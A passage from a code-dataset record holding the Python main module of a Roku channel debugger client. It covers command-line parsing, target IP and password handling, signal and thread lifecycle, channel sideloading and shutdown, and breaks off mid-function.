'''","repo_name":"ezopezo/deepdive","sub_path":"2_iter_gen/project5/project5.py","file_name":"project5.py","file_ext":"py","file_size_in_byte":4332,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"12096134889","text":"import argparse, atexit, datetime, enum, inspect, ipaddress, os, pathlib\nimport platform, signal, sys, tempfile, time, threading, traceback\n\n# SystemExit only exits the current thread, so call it by its real name\nThreadExit = SystemExit\n\n########################################################################\n# GLOBAL CONFIGURATION\n# This module is the main entry point for this package. Set up global\n# config used by all modules.\n# This must be done, PRIOR to importing other classes from this package.\n########################################################################\nclass GlobalConfig(object):\n def __init__(self):\n # Add all attributes here, to make it clear what this object contains.\n # All values will be set when a RokuDebug instance is created.\n # done loading.\n\n # Data\n self.debug_level = 0 # global, may be bumped up locally\n self.verbosity = None\n\n # functions\n self.do_exit = None # function: always use this to exit\n self.set_exit_code = None # function: Override exit_code passed to do_exit()\n self.get_is_exiting = None # function: is rokudebug exiting?\n self.get_monotonic_time = None\n self.get_version_str = None\n\nglobal_config = GlobalConfig()\nsys.modules['__main__'].global_config = global_config\nfrom .model import Verbosity # done after main.global_config set\nglobal_config.verbosity = Verbosity.NORMAL\n########################################################################\n\n# Local imports\nfrom tempfile import mkstemp\nfrom .model import AppInstallerClient\nfrom .model import DebuggerClient\nfrom .model import DebugUtils\nfrom .model import FakeDebuggerClient # used for debugging\nfrom .model import LibrarySourceSpecifier\nfrom .model import MonotonicClock\nfrom .model import ProtocolFeature\nfrom .model import SourceCodeInspector\nfrom .model.testmgr import NullTestManager, TestManager\nfrom .model import Verbosity\nfrom .model import get_supported_protocols_str, check_debuggee_protocol_version\nfrom .cli import CommandLineInterface\nfrom .dap import DebugAdapterProtocol\n\n# When changing the version number, be sure to update SOFTWARE_REVISION_TIMESTAMP\nVERSION_MAJOR = 3 # int major\nVERSION_MINOR = 2 # int minor\nVERSION_PATCH_LEVEL = 0 # int patch level\n\n# Software revision timestamp is similar to a build number, and is primarly\n# used to differentiate between pre-release builds. It is milliseconds since\n# 1970-01-01T00:00:00.000Z (64 bits) and must be updated when any change is\n# made that may affect the behavior of this program.\n# Calculate timestamp on linux: date -u +%s%3N or expr 1000 \\* `date -u +%s`\nSOFTWARE_REVISION_TIMESTAMP = 1675444061659 # 64-bit long int\n\n# We treat signals as names because not all enum values are\n# available on all platforms\nCTRL_BREAK_EVENT_LITERAL = 'CTRL_BREAK_EVENT'\nCTRL_C_EVENT_LITERAL = 'CTRL_C_EVENT'\nSIGHUP_LITERAL = 'SIGHUP'\nSIGINT_LITERAL = 'SIGINT'\nSIGTERM_LITERAL = 'SIGTERM'\n\n_rokudebug_main = None\n\n# Validated set of options from the command line\nclass RokuDebugOptions(object):\n def __init__(self):\n self.channel_file = None\n self.dap_log_file_path = None\n self.no_execute = False\n self.run_mode = RunMode.CLI\n self.stop_target_on_launch = False\n self.target_ip = None\n self.target_pass = None\n\n@enum.unique\nclass RunMode(enum.IntEnum):\n DAP = enum.auto() # Run as a Debug Adapter Protocol server/bridge\n CLI = enum.auto() # Go to command-line interface, don't load channel\n DEBUG = enum.auto() # Upload and run the channel, attach to debuggee. go to CLI\n REMOVE = enum.auto() # Remove installed channel\n RUN = enum.auto() # Upload and run the channel, do not attach to debuggee\n\n def to_option_str(self):\n return '--{}'.format(self.name.lower()) # pylint: disable=no-member\n\n def to_user_str(self):\n return self.name.lower() # pylint: disable=no-member\n\n\n# This is the primary entry point for this script. Must be a global singleton.\nclass RokuDebug(object):\n __lifecycle_lock = threading.RLock()\n __lifecycle_cond_var = threading.Condition(lock=__lifecycle_lock)\n\n def __init__(self):\n with RokuDebug.__lifecycle_lock:\n self.__init_nolock()\n\n def __init_nolock(self):\n global _rokudebug_main\n assert not _rokudebug_main # enforce singleton\n self._debug_level = 0 # debug level for this object\n\n self.__orig_stdin = None # set in main()\n self.__orig_stderr = None # set in main()\n self.__orig_stdout = None # set in main()\n\n self.options = RokuDebugOptions()\n\n # REMIND: These should be moved to the module, so that do_exit()\n # will work when there is no global object instance.\n self._exit_now = False\n self._exit_cond_var = threading.Condition(lock=threading.Lock()) # main thread waits on this\n self._exit_code = None # None is not 0\n\n self.__tmp_dir = None # Created iff needed, use self.get_tmp_dir_path()\n self.__test_mgr = None # Always exists, may have no tests\n self.__lib_sources = [] # Source not in channel package (e.g., a library)\n self.__test_dirs = [] # Directories to load tests from\n self.__run_test_name = None # Name of test to auto-run on startup\n self.__debug_fake_connection = False\n self.__interface_thread = None # runs cli, set in main()\n self.__monotonic_clock = None # set in main()\n self.__debugger_client = None\n self.__cli = None # Command-line interface\n self.__dap = None # Debug Adapter Protocol (IDE integration)\n\n # output controller has four stream-like attributes:\n # localout, localerr, targetout, targeterr\n self.__output_controller = None\n\n # protected with RokuDebug.__lifecycle_lock\n self.__is_shut_down = False\n self.__is_cli_running = False\n\n # Unsupported signals will have a value of None\n self.__signal_name_to_enum = {\n CTRL_BREAK_EVENT_LITERAL:None,\n CTRL_C_EVENT_LITERAL:None,\n SIGHUP_LITERAL:None,\n SIGINT_LITERAL:None,\n SIGTERM_LITERAL:None\n }\n self.__valid_signals = {'C'}\n\n self.__tmp_files = [] # automatically deleted upon exit\n\n # Set global attributes, used by other modules\n global_config.get_monotonic_time = self.get_monotonic_time\n global_config.get_version_str = self.get_version_str\n # global_config.do_exit was set when this module was loaded\n\n # module-global reference used by signal handlers and maybe others\n _rokudebug_main = self\n\n def main(self):\n try:\n try:\n return self.__main_impl()\n except ThreadExit: raise\t# Normal exit\n except BaseException as e:\n print('INTERNAL ERROR: Exception in main():')\n traceback.print_exc(file=sys.stderr)\n # do_exit() raises ThreadExit exception on this main (non-daemon) thread\n do_exit(1, 'INTERNAL ERROR: exception in main(): {}'.format(e))\n except ThreadExit as e:\n # Normal shutdown path - exiting this thread exits the process\n # Wait for all daemon threads to exit, because if they try\n # to print anything while this thread terminates, the python\n # interpreter will have a hissy fit and dump a core.\n self.shutdown()\n raise e\n raise AssertionError('Should not reach this line')\n\n def __main_impl(self):\n atexit.register(exit_handler)\n self.__install_signal_handlers()\n self.__orig_stdin = sys.stdin\n self.__orig_stderr = sys.stderr\n self.__orig_stdout = sys.stdout\n self.__parse_args()\n\n if self.options.no_execute:\n self.__validate_files_and_exit()\n\n self.__monotonic_clock = MonotonicClock(global_config.debug_level)\n self.__print_startup_info()\n self.__init_test_mgr()\n\n if self.options.run_mode == RunMode.DAP:\n self.__dap = DebugAdapterProtocol(self.__orig_stdin,\n self.__orig_stdout)\n self.__dap.start()\n else:\n self.__interface_thread = threading.Thread(\n name='Interface', target=self, daemon=True)\n self.__interface_thread.start()\n\n # Idle and wait for events, signals, and interrupts. This thread\n # sits idle because only this initial/main thread can exit this\n # process cleanly, because sys.exit() (and the ThreadExit exception)\n # are ignored on other threads. Also, python will deliver all\n # signals to this initial/main thread.\n if self.__check_debug(3):\n print('debug:main: main() idling...')\n with self._exit_cond_var:\n while not self._exit_now:\n # As a backup, poll periodically without a cond_var\n # notification.\n self._exit_cond_var.wait(5)\n\n if self.__check_debug(2):\n print('debug: main thread exits')\n do_exit(0)\n # END main_impl()\n\n # Invoked with --no-execute to validate files in self.options\n # Exits script, never returns\n def __validate_files_and_exit(self):\n options = self.options\n assert options.no_execute\n if options.run_mode in (RunMode.DEBUG, RunMode.RUN):\n assert options.channel_file\n path = pathlib.Path(options.channel_file)\n err_msg = None\n if path.is_dir():\n err_msg = 'Is a directory (not a file): {}'.format(path)\n elif not os.access(path, os.R_OK):\n err_msg = 'File does not exist, or is not readable: {}'.format(\n path)\n if err_msg:\n if global_config.verbosity >= Verbosity.ERRORS_ONLY:\n print(err_msg, file=sys.stderr)\n do_exit(1)\n if global_config.verbosity >= Verbosity.NORMAL:\n print('Would {}: {}'.format(\n options.run_mode.to_user_str(), path))\n do_exit(0)\n\n # Called on self.__interface_thread\n def __call__(self):\n try:\n self.__run_interface()\n except ThreadExit: raise\n except: # Yes, catch EVERYTHING\n traceback.print_exc()\n global_config.do_exit(1, 'INTERNAL ERROR: Uncaught exception')\n\n # Called on self.__interface_thread\n def __run_interface(self):\n if self.__check_debug(2):\n print('debug: rdb.__run_interface(), mode={}'.format(\n self.options.run_mode.name))\n if self.options.channel_file:\n if not SourceCodeInspector(self.options.channel_file).verify():\n do_exit(1, 'ERROR: Bad channel file: {}'.format(\n self.options.channel_file))\n\n installer = AppInstallerClient(self.options.target_ip,\n self.options.target_pass)\n\n if self.options.run_mode == RunMode.CLI:\n self.__start_plain_cli(installer)\n elif self.options.run_mode == RunMode.DEBUG:\n self.__debug_channel(installer)\n elif self.options.run_mode == RunMode.REMOVE:\n self.__remove_channel(installer)\n elif self.options.run_mode == RunMode.RUN:\n self.__run_channel(installer)\n else:\n raise AssertionError(\n 'INTERNAL ERROR: bad run mode: {}'.format(self.options.run_mode))\n\n do_exit(0)\n\n def get_monotonic_time(self):\n return self.__monotonic_clock.get_time()\n\n def get_tmp_dir_path(self):\n with self.__lifecycle_lock:\n if not self.__tmp_dir:\n self.__tmp_dir = tempfile.TemporaryDirectory(prefix='rrdb_')\n return self.__tmp_dir.name\n\n def __install_signal_handlers(self):\n # MS-Windows (and probably other platforms) don't support signals,\n # or may have different signal symbols/numbers. Let's try each\n # one and handle failure gracefully\n for sig_name in self.__signal_name_to_enum.keys():\n self.__install_one_signal_handler(sig_name)\n\n def __install_one_signal_handler(self, signame):\n sig = None\n err = None\n try:\n sig = getattr(signal, signame, None)\n if not sig:\n raise ValueError(signame)\n signal.signal(sig, _global_signal_handler)\n except Exception:\n err = 'signal not supported on platform (ignored): {}'.format(\n signame)\n if global_config.debug_level >= 5:\n print('debug: main: DUMPING EXCEPTION (IGNORED):')\n print(traceback.format_exc())\n\n if global_config.debug_level >= 1:\n if err:\n print('debug: main: {}'.format(err))\n else:\n print('debug: main: signal handler installed: {}'.format(signame))\n\n self.__signal_name_to_enum[signame] = sig\n\n # Upon return, self.options will be in a consistent state, with\n # no conflicting options. If a consistent state could not be achieved\n # with the provided command-line options, exits this script with\n # an error.\n def __parse_args(self):\n self.__program_name = os.path.basename(sys.argv[0])\n use_help_str = ' Use --help for help'\n options = self.options\n\n ################################################################\n # PRIORITY ARGUMENT PARSING\n # Process arguments that take effect early and affect the behavior\n # of other options, regardless of their order on the command line.\n ################################################################\n\n\n ##### PRIORITY 0 ARGS #####\n # Arguments that affect other arguments, regardless of order\n\n # If Debug Adapter Protocol (DAP) is specified, stdin/stdout\n # are used for the protocol and NO other I/O can go to those\n # streams. Redirect immediately.\n add_arg_dap = lambda parser: \\\n parser.add_argument('--dap', dest='dap',\n action='store_true', default=False,\n help = 'Expect Debug Adapter Protocol on stdin/stdout.'\n ' (IDE Integration)')\n\n add_arg_dap_log_file = lambda parser: \\\n parser.add_argument('--dap-log', dest='dap_log_file_path',\n action='store', type=str, default=None,\n help='Output file for errors and warnings, when in DAP mode')\n\n # Never redirect anything if --no-execute specified\n add_arg_no_execute = lambda parser: \\\n parser.add_argument('--no-execute', '-n',\n action='store_true', default=False,\n help='Validate command-line arguments, but do not'\n ' perform any actions')\n\n parser = argparse.ArgumentParser(add_help=False)\n add_arg_dap(parser)\n add_arg_dap_log_file(parser)\n add_arg_no_execute(parser)\n args, _ = parser.parse_known_args()\n\n if args.dap:\n options.run_mode = RunMode.DAP\n raise NotImplementedError(\n 'Sorry, the Debug Adapter Protocol (DAP)'\n ' needs maintenance and has been disabled')\n if args.dap_log_file_path:\n if options.run_mode != RunMode.DAP:\n do_exit(1, '--dap-log only valid with --dap')\n else:\n if args.dap:\n do_exit(1, '--dap requires --dap-log')\n options.dap_log_file_path = args.dap_log_file_path\n options.no_execute = args.no_execute\n\n if options.run_mode == RunMode.DAP:\n self.__redirect_for_dap() # if no_execute, only validates\n\n # Avoid using stale objects, below\n _ = None\n parser = None\n args = None\n\n\n ##### PRIORITY 1 ARGS #####\n # More options that affect other options, regardless of order\n\n def add_arg_debug_level(parser, include_help):\n help_arg = 'Debug this script: 1=silent validation, 2-10=more output' \\\n if include_help else argparse.SUPPRESS\n parser.add_argument('--debug-level', dest='debug_level', type=int,\n action='store',default=0,\n help=help_arg)\n\n def add_arg_debug(parser, include_help=True):\n help_arg = 'Upload, run, and debug channel (default)' \\\n if include_help else argparse.SUPPRESS\n parser.add_argument('--debug', dest='debug_channel',\n action='store_true',default=False,\n help = help_arg)\n\n def add_arg_long_help(parser, include_help):\n help_arg = 'Show long help with debugging and test options, then exit' \\\n if include_help else argparse.SUPPRESS\n parser.add_argument('--long-help', dest='long_help',\n action='store_true',default=False,\n help=help_arg)\n\n parser = argparse.ArgumentParser(add_help=False)\n add_arg_debug_level(parser, False)\n add_arg_long_help(parser, False)\n # --debug is not a high-priority arg, but it needs to be here\n # so that it is ignored for now, rather than being interpreted\n\t\t# as --debug-level.\n add_arg_debug(parser, False)\n args, _ = parser.parse_known_args()\n\n # Global debug level (can be overridden in modules)\n global_config.debug_level = args.debug_level # global debug level\n\n if options.run_mode == RunMode.DAP and self.__check_debug(2):\n print('debug: Testing stdout redirect to DAP log')\n print('debug: Testing stderr redirect to DAP log', file=sys.stderr)\n\n show_long_help_and_exit = args.long_help\n\n # Make sure we don't use stale objects, below\n parser = None\n args = None\n _ = None\n\n\n\n ################################################################\n # Normal argument parsing\n # All of the options are parsed here, so that they will all show\n # up in help. Some options may be re-parsed, but the result\n # should be identical.\n ################################################################\n\n #\n # Define arguments\n # ArgumentParser help lists these arguments, in the order they\n # are added.\n parser = argparse.ArgumentParser()\n parser.description = 'Client for the Roku debugging protocol'\n add_arg_long_help(parser, True)\n add_arg_dap(parser)\n add_arg_dap_log_file(parser)\n add_arg_debug(parser)\n add_arg_no_execute(parser)\n parser.add_argument('--remove', dest='remove_channel',\n action='store_true', default=False,\n help = 'Remove the installed channel')\n parser.add_argument('--run','-r', dest='run_channel',\n action='store_true',default=False,\n help = 'Upload and run the channel, but do not debug it')\n parser.add_argument('--stop-on-launch', '-s',\n dest='stop_target_on_launch',\n action='store_true',default=False,\n help = 'Stop target immediately upon launch, allows'\n ' breakpoints to be set prior to execution'),\n parser.add_argument('--targetip','-t', dest='target_ip',\n action='store',type=str,\n help='IP Address of the target Roku device.'\n ' If not specified, looks at ROKU_DEV_TARGET'\n ' environment variable.')\n parser.add_argument('--targetpass','-p', dest='target_pass',\n action='store',type=str,\n help='Password for the target device app installer.'\n ' If not specified, looks at 1) ROKU_DEV_PASSWORD'\n ' environment variable, 2) DEVPASSWORD env var.'\n ' 3) If still not found, interactively'\n ' asks for password.')\n # REMIND: Add better descriptions of verbosity levels\n parser.add_argument('-v', dest='verbosity',\n action='count',default=Verbosity.NORMAL.value,\n help = 'Increase verbosity by one (may be used multiple times)')\n parser.add_argument('--verbosity', dest='verbosity',\n action='store',default=Verbosity.NORMAL.value,type=int,\n help = 'Set verbosity level 0=silent|1=errors|2=normal|3=high')\n\n parser.add_argument('--version', '--Version', '-V', dest='print_version',\n action='store_true',default=False,\n help='Print version of this program and exit')\n\n # Collect the channel file path\n parser.add_argument('channel_file', nargs='?')\n\n ################################################################\n # Options that only appear with --long-help\n # --debug-* arguments are used to debug this script.\n add_arg_debug_level(parser, show_long_help_and_exit)\n parser.add_argument(\"--debug-fake-connection\", dest='debug_fake_connection',\n action='store_true', default=False,\n help='Don\\'t sideload channel, go straight into command-line with fake connection.'\\\n ' Useful when developing this script'\n if show_long_help_and_exit else argparse.SUPPRESS)\n\n # allow breakpoints like \"components/KeyHandler.brs\" w/o lib: or pkg: URI scheme\n parser.add_argument('--debug-preserve-breakpoint-path',\n dest='debug_preserve_breakpoint_path',\n action='store_true', default=False,\n help='Don\\'t add pkg: and lib: prefixes to breakpoint paths'\\\n if show_long_help_and_exit else argparse.SUPPRESS)\n\n # load additional source directory\n parser.add_argument('--add-lib-src', dest='lib_src',\n action='append', default=[],\n help='Add source for library: \"mylibname:/path/to/source\"'\n ', may be used multiple times')\n\n # load external tests\n # dest appears in help, so name it accordingly: --add-test-dir TEST_DIR\n parser.add_argument('--add-test-dir', dest='test_dir',\n action='append', default=[],\n help='Load external tests, may be used multiple times'\\\n if show_long_help_and_exit else argparse.SUPPRESS)\n\n # load external tests\n # dest appears in help, so name it accordingly: --run-test TEST_NAME\n parser.add_argument('--run-test', dest='test_name', type=str,\n action='store', default=None,\n help='Run an externally-loaded test'\\\n if show_long_help_and_exit else argparse.SUPPRESS)\n\n ################################################################\n\n if show_long_help_and_exit:\n parser.parse_args(['--help'])\n if self.__check_debug(1):\n raise AssertionError('parse_args() did not exit')\n args = parser.parse_args()\n\n #\n # Validate and commit arguments\n #\n\n # debuglevel has already been set, above\n\n if (args.print_version):\n do_exit(0, '{} {}'.format(\n self.__program_name, self.get_version_str(True)))\n\n # Stop on launch\n options.stop_target_on_launch = args.stop_target_on_launch\n\n # Target IP\n target_ip = args.target_ip\n if not target_ip:\n target_ip = os.environ.get('ROKU_DEV_TARGET', None)\n if target_ip:\n try:\n options.target_ip = ipaddress.ip_address(target_ip)\n except Exception:\n do_exit(1, 'bad target IP: {}.'.\n format(target_ip)+use_help_str)\n else:\n do_exit(1, '--targetip not specified, no environment variables found.' + use_help_str)\n options.target_ip = target_ip\n\n # Target app installer password\n target_pass = args.target_pass\n if not target_pass:\n target_pass = os.environ.get('ROKU_DEV_PASSWORD', None)\n if not target_pass:\n target_pass = os.environ.get('DEVPASSWORD', None)\n if not target_pass:\n import getpass\n target_pass = getpass.getpass('Password for {}: '.format(options.target_ip))\n options.target_pass = target_pass\n\n # Verbosity\n global_config.verbosity = Verbosity.from_int(args.verbosity)\n\n # Channel operation (debug/run, mutually exclusive)\n # channel_required must be set for each operation\n run_modes_selected = []\n if args.dap:\n channel_required = False\n options.run_mode = RunMode.DAP\n run_modes_selected.append(options.run_mode.to_option_str())\n if args.debug_channel:\n channel_required = True\n options.run_mode = RunMode.DEBUG\n run_modes_selected.append(options.run_mode.to_option_str())\n if args.remove_channel:\n channel_required = False\n options.run_mode = RunMode.REMOVE\n run_modes_selected.append(options.run_mode.to_option_str())\n if args.run_channel:\n channel_required = True\n options.run_mode = RunMode.RUN\n run_modes_selected.append(options.run_mode.to_option_str())\n if args.test_name:\n channel_required = False\n options.run_mode = RunMode.DEBUG\n run_modes_selected.append('--run-test')\n\n if not len(run_modes_selected):\n if args.channel_file:\n options.run_mode = RunMode.DEBUG\n channel_required = True\n if global_config.verbosity >= Verbosity.HIGH:\n print('info: no mode specified for channel, defaulting to --debug')\n else:\n options.run_mode = RunMode.CLI\n channel_required = False\n if global_config.verbosity >= Verbosity.HIGH:\n print('info: no mode and no channel specified, going to command line')\n run_modes_selected.append(options.run_mode.to_option_str())\n elif len(run_modes_selected) > 1:\n msg = 'Options are incompatible: {}'.format(' '.join(run_modes_selected))\n do_exit(1, msg)\n mode_arg = run_modes_selected[0]\n\n # channel_file\n if args.channel_file:\n if not channel_required:\n do_exit(1, 'channel file not allowed with {}.{}'.format(mode_arg, use_help_str))\n self.options.channel_file = args.channel_file\n else:\n if channel_required:\n do_exit(1, 'Channel file required with {}.{}'.format(mode_arg, use_help_str))\n self.options.channel_file = None\n\n self.__debug_fake_connection = args.debug_fake_connection\n if self.__debug_fake_connection:\n global_config.debug_level = max(global_config.debug_level, 1) # 1 = internal validation\n\n for lib_src_spec in args.lib_src:\n try:\n self.__lib_sources.append(LibrarySourceSpecifier(lib_src_spec))\n except ValueError as e:\n do_exit(1, 'bad library source specifier: {}'.format(e))\n\n if args.test_dir:\n self.__test_dirs = args.test_dir\n global_config.debug_level = max(global_config.debug_level, 1) # 1 = internal validation\n if args.test_name:\n self.__run_test_name = args.test_name\n global_config.debug_level = max(global_config.debug_level, 1) # 1 = internal validation\n\n self.__debug_preserve_breakpoint_path = args.debug_preserve_breakpoint_path\n if self.__debug_preserve_breakpoint_path:\n global_config.debug_level = max(global_config.debug_level, 1) # enable debug validation\n\n # END __parse_args()\n\n # REQUIRES: valid attributes self.options.dap,dap_log_file_path,no_execute\n # If no_execute, only verifies that log file is writeable\n # Exits this script if any error occurs\n def __redirect_for_dap(self):\n assert self.__orig_stdin\n assert self.__orig_stderr\n assert self.__orig_stdout\n assert self.options.run_mode == RunMode.DAP\n assert self.options.dap_log_file_path # required with dap\n path = pathlib.Path(self.options.dap_log_file_path)\n if self.options.no_execute:\n if path.is_dir():\n do_exit(1, 'DAP log path is a directory (not a file): {}'.format(path))\n if path.exists():\n if not os.access(path, os.W_OK):\n do_exit(1, 'DAP log file is not writeable: {}'.format(path))\n else:\n if not os.access(path.parent, os.W_OK):\n do_exit(1, 'Directory not writeable: {}'.format(path.parent))\n else:\n try:\n new_out = open(path, mode='w')\n except OSError as e:\n do_exit(1, 'Could not write to {} ({})'.format(\n path, e.strerror))\n sys.stdout = new_out\n sys.stderr = new_out\n\n def __print_startup_info(self):\n needs_hrule = global_config.debug_level >= 1 or global_config.verbosity >= Verbosity.HIGH\n if needs_hrule:\n print('------------------------------------------------------')\n if (global_config.debug_level >= 1):\n print('debug: debuglevel: {}'.format(global_config.debug_level))\n print('debug: validation: internal validation enabled (debuglevel > 0)')\n print('debug: verbosity: {}({})'.format(\n global_config.verbosity.name, global_config.verbosity.value))\n if (global_config.verbosity >= Verbosity.HIGH) or (global_config.debug_level >= 2):\n if global_config.verbosity >= Verbosity.HIGH:\n pre = 'info: '\n else:\n pre = 'debug: '\n print('{} {:>18s}: {}'.format(\n pre, self.__program_name, self.get_version_str()))\n print('{} verbosity: {}({})'.format(\n pre, global_config.verbosity.name.lower(), global_config.verbosity.value))\n print('{} this o.s.: {}'.format(\n pre, ' '.join(platform.uname())))\n print('{} targetip: {}'.format(pre, self.options.target_ip))\n print('{} targetpass: {}'.format(pre, self.options.target_pass))\n print('{}supported protocols: {}'.format(\n pre, get_supported_protocols_str()))\n if self.__lib_sources:\n for lib_src in self.__lib_sources:\n print('{} lib source: {}'.format(\n pre, lib_src))\n if self.__test_dirs:\n print('{} test dirs: {}'.format(\n pre, ', '.join(self.__test_dirs)))\n if self.__run_test_name:\n print('{} auto-run test: {}'.format(pre, self.__run_test_name))\n if needs_hrule:\n print('------------------------------------------------------')\n\n sys.stdout.flush() # Helpful when stdout redirected\n\n # [int,int,int,[int-or-string]] get_version()\n # Get the version number as an array. If includeBuild is False, returns:\n # [int major, int minor, int patchlevel]\n # If includeBuild is True, returns:\n # [int major, int minor, int patchlevel, int-or-string buildID]\n # The buildID is only included if includeBuild is True, and it may\n # be an int, or it may be a string (e.g., 'localbuild').\n @staticmethod\n def get_version(includeRevision=False):\n version = [VERSION_MAJOR, VERSION_MINOR, VERSION_PATCH_LEVEL]\n if includeRevision:\n version.append(SOFTWARE_REVISION_TIMESTAMP)\n return version\n\n @staticmethod\n def get_version_str(includeRevision=False):\n versionString = '{}.{}.{}'.format(\n VERSION_MAJOR, VERSION_MINOR, VERSION_PATCH_LEVEL)\n if includeRevision:\n rev_str = DebugUtils.revision_timestamp_to_str(SOFTWARE_REVISION_TIMESTAMP)\n versionString += ' ' + rev_str\n return versionString\n\n # Start the command-line interface without launching a channel\n def __start_plain_cli(self, app_installer):\n if self.__check_debug(2):\n print('debug: start_plain_cli()')\n self.__cli = CommandLineInterface(self.options.channel_file,\n self.__lib_sources, self.__output_controller,\n self.options.stop_target_on_launch, self.__test_mgr,\n self.__debug_preserve_breakpoint_path)\n\n with self.__lifecycle_lock:\n self.__is_cli_running = True\n try:\n self.__cli.interact(app_installer, None)\n finally:\n with self.__lifecycle_lock:\n self.__is_cli_running = False\n self.__lifecycle_cond_var.notify_all()\n\n def __debug_channel(self, app_installer):\n if self.__check_debug(2):\n print('debug: debug_channel()')\n\n # Create the debugger client\n dclient = None\n self.__cli = CommandLineInterface(self.options.channel_file,\n self.__lib_sources, self.__output_controller,\n self.options.stop_target_on_launch, self.__test_mgr,\n self.__debug_preserve_breakpoint_path)\n if self.__debug_fake_connection:\n if global_config.verbosity >= Verbosity.NORMAL:\n print('info: NOT side-loading channel, because --debug-fake-connection')\n self.__debugger_client = FakeDebuggerClient(self.__cli.update_received)\n dclient = self.__debugger_client\n else:\n app_installer.remove()\n app_installer.install(self.options.channel_file, remote_debug=True)\n self.__debugger_client = \\\n DebuggerClient(self.options.target_ip,\n self.__cli.update_received, sys.stdout)\n dclient = self.__debugger_client\n dclient.connect()\n self.__check_protocol_version(dclient, print_warnings=True)\n\n # Verify test is compatible with target\n test = self.__test_mgr.get_current_test()\n if test:\n protocol_version = self.__debugger_client.get_protocol_version()\n if protocol_version < test.min_protocol_version:\n print('ERROR: Incompatible protocol, required={},actual={}'.format(\\\n test.min_protocol_version.to_user_str(True),\n protocol_version.to_user_str(True)))\n global_config.do_exit(1, 'Incompatible protocol')\n del test, protocol_version\n\n # Start the interface\n if self.__check_debug(2):\n print('debug: stop on launch: {}'.format(\n self.options.stop_target_on_launch))\n\n with self.__lifecycle_lock:\n self.__is_cli_running = True\n try:\n self.__cli.interact(app_installer, self.__debugger_client)\n finally:\n with self.__lifecycle_lock:\n self.__is_cli_running = False\n self.__lifecycle_cond_var.notify_all()\n\n def __remove_channel(self, app_installer):\n app_installer.remove()\n\n def __run_channel(self, app_installer):\n app_installer.remove()\n app_installer.install(self.options.channel_file, remote_debug=False)\n\n # Exits this script if the target's protocol version is not supported\n def __check_protocol_version(self, debugger_client, print_warnings=False):\n check_debuggee_protocol_version(debugger_client.protocol_version)\n if print_warnings and \\\n (global_config.verbosity > Verbosity.ERRORS_ONLY):\n if self.options.stop_target_on_launch and \\\n not debugger_client.has_feature(\n ProtocolFeature.STOP_ON_LAUNCH_ALWAYS):\n print('warn: disabling stop-on-launch'\n ' (unsupported by debuggee)')\n self.options.stop_target_on_launch = False\n\n # Returns path to tmp file. File will be deleted when this script exits\n def create_temp_file(self):\n fileInfo = mkstemp()\n os.close(fileInfo[0])\n self.__tmp_files.append(fileInfo[1])\n return fileInfo[1]\n\n # Blocks until all daemon threads have exited\n def shutdown(self):\n try:\n if self.__check_debug(2):\n print('debug: RokuDebug:shutdown() start')\n self.__shutdown_impl()\n if self.__check_debug(2):\n print('debug: RokuDebug:shutdown() complete')\n\n # Catch and print any exception here, because if daemon threads\n # have not yet exited, the python interpreter may freak out\n # and choose to dump core rather than printing the exception.\n except BaseException as e:\n traceback.print_exc(file=sys.stderr)\n print('INTERNAL ERROR: exception in shutdown(): {}'.format(e),\n file=sys.stderr)\n\n # Blocks until all daemon threads have exited\n def __shutdown_impl(self):\n wait_for_cli_shutdown = False\n with self.__lifecycle_lock:\n if self.__is_shut_down:\n return\n\n # Disable reporting errors that normally occur during shutdown\n if self.__debugger_client:\n self.__debugger_client.set_suppress_connection_errors(True)\n\n # Shut down user interface\n if self.__cli:\n self.__cli.shutdown_async()\n self.__cli = None\n wait_for_cli_shutdown = True\n\n # Shut down the connection to the debug target\n # Close the debugger client explicitly, in case the user\n # interface has not been created (e.g., on a protocol mismatch)\n if self.__debugger_client:\n self.__debugger_client.shutdown()\n self.__debugger_client = None\n\n if wait_for_cli_shutdown:\n with self.__lifecycle_cond_var:\n while self.__is_cli_running:\n self.__lifecycle_cond_var.wait(1.0)\n\n with self.__lifecycle_lock:\n # Clean up tmp files and whatnot\n self.cleanup()\n self.__is_shut_down = True\n\n # Cleanup tmp files, etc\n # This is often called twice during process exit: once while shutting\n # down this debugger, and once as python atexit hook\n def cleanup(self):\n if self.__check_debug(2):\n print('debug: RokuDebug: cleanup()')\n with self.__lifecycle_lock:\n for tmp_file in self.__tmp_files:\n if (os.path.exists(tmp_file)):\n print(\"removing temp file: {:s}\".format(tmp_file))\n os.remove(tmp_file)\n self.__tmp_files = []\n\n # Sets the exit code that will be returned by this process to the OS,\n # overriding any value sent to do_exit(). This should only be called\n # when the exit sequence has begun.\n # @return the actual exit_code\n def set_exit_code(self, exit_code):\n # Locking is by far preferred, but don't deadlock during shutdown\n # sequence.\n locked = self._exit_cond_var.acquire(blocking=True, timeout=0.1)\n try:\n return self._set_exit_code_nolock(exit_code)\n finally:\n if locked:\n self._exit_cond_var.release()\n\n # Always creates self.__test_mgr. If test directories have been specified,\n # loads the tests in those directories.\n def __init_test_mgr(self) -> None:\n if self.__check_debug(1): # 1 = validation\n assert not self.__test_mgr\n\n if self.__test_dirs:\n self.__test_mgr = TestManager(self.get_tmp_dir_path())\n if global_config.verbosity >= Verbosity.NORMAL:\n print('info: loading tests')\n for test_dir in self.__test_dirs:\n self.__test_mgr.load_dir(test_dir)\n else:\n self.__test_mgr = NullTestManager()\n\n if self.__run_test_name:\n if not self.__test_mgr.set_current_test(self.__run_test_name):\n print('FATAL: Test not found: {}'.format(self.__run_test_name))\n raise ThreadExit(1)\n\n if self.__test_mgr.get_current_test():\n test = self.__test_mgr.get_current_test()\n self.options.channel_file = self.__test_mgr.get_test_channel_package_path(test)\n self.options.stop_target_on_launch = test.stop_channel_on_launch\n\n if self.__check_debug(1): # 1 = validation\n assert self.__test_mgr\n\n return None\n\n # @return the new exit code\n # @see set_exit_code()\n def _set_exit_code_nolock(self, exit_code):\n if self.__check_debug(1):\n # This thread may have legitimately failed to get the lock\n assert not self._exit_cond_var.acquire(blocking=False), \\\n '*MAYBE* a locking problem in exit handling'\n\n if self._exit_code == None:\n self._exit_code = exit_code\n\n if self.__check_debug(2):\n print('debug: set_exit_code({}) -> {}'.format(exit_code,\n self._exit_code))\n return self._exit_code\n\n # Always called on main thread (the same one that called main())\n def _signal_handler(self, signum, frame):\n\n debug_level = global_config.debug_level\n if debug_level >= 2:\n ident = None\n for key,value in self.__signal_name_to_enum.items():\n if value == signum:\n ident = key\n print('debug: dumping stack traces on signal {},ident={}'.format(\n signum, ident))\n traceback.print_stack()\n\n # Local reference to avoid race to destruction\n cli = 